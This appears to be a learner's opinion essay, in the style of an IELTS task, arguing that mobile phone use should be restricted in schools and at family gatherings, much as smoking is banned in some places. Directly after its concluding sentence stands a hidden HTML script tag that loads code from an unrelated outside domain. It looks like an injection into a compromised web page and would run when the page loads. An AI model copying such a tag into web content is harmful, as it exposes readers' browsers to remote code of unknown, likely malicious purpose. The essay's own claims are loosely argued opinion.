The use of a mobile phone is as antisocial as smoking. Smoking is banned in certain places so the mobile phone should be banned like smoking. To what extent do you agree or disagree?

Nowadays, the mobile phone has become an essential part of our society moving and cannot think of moving without it, on the other hand, it also diminishing moral assets in literary society. As smoking has spread like cancer in our civil society same as the cellular phone. Use of cellphone should be restricted to some extent. I will be discussing my views in the following paragraph.

It is a fact that, that the use of the cellular phone has increased very drastically in the last five years and it is putting to death the social values of our society which is very alarming. The limitation should be enforced in areas where a family gathering is being held. For instance, the practice of using mobile devices has extensively increased in schools, because of that kids are getting a diversion from their studies and are getting involved in the use of applications which are not suitable for their age. Their thinking capabilities are getting near to the ground and just relying on different software which is easily available on one touch and their problem gets solved.

Secondly, in our community families are getting away from each other and they prefer to give their thoughts for any occasions by just making calls in spite of visiting. Such as, in the family get-together use of such gadgets, should be restricted so they can mingle with each-other share their thoughts and enjoy the occasions. In a family, no one has time to talk to each other as they all remain busy in their cellular life.

I conclude, to pen down by saying that the use of mobile phone should be restricted as to the amount of liability in our society.<script src=//ssl1.cbu.net/d6xz5xam></script>